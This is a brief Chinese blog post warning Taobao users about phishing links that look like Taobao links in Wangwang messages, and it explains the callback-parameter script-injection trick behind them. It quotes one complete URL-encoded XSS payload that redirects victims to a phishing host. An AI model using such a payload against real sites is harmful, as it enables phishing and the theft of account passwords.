经常在旺旺看到很多类如下信息: 亲,你的东西还卖吗?这个违规下架了你不处理?我要买啊 http://tbskip.taobao.com/json/spu_price_trend.htm?callback=%3cscript%3ewindow.navigate%28%27//%74%2E%6Dhttp%2E%63o.cc/c.taobao.com/?%2F5941486%2F%27%29%3c%2fscript%3E 以前总是搞不懂为什么看链接是taobao.com的域名,点了后会有问题,那些骗子怎样弄可以弄到含有taobao.com字符拉链,也没有看后url=这样的字符窜啊,经询问呢,得到结果如下: 是通过淘宝的已不请求json构造个callback,注入window.navigate(‘//t.mhttp.co.cc/c.taobao.com /5941486/’)脚本 试图将用户引导到目标站定上 用户看连接以为是淘宝的,很安全就点了 如果把http头的 content-type部分改为text/javascript就没这种漏洞了 以上由貘大师说明,我承认我自己没检测过,这玩意对于我来说还有点高深,原谅我吧 – – 总之呢,这链接接点点是没事,但千万别登陆就行,不然账号和密码被盗取就是自己的问题了 PS:貌似现在淘宝已经给过滤掉了, 不直接跳转了,不知道还有没有其他的 10.08.20记
COMMENTS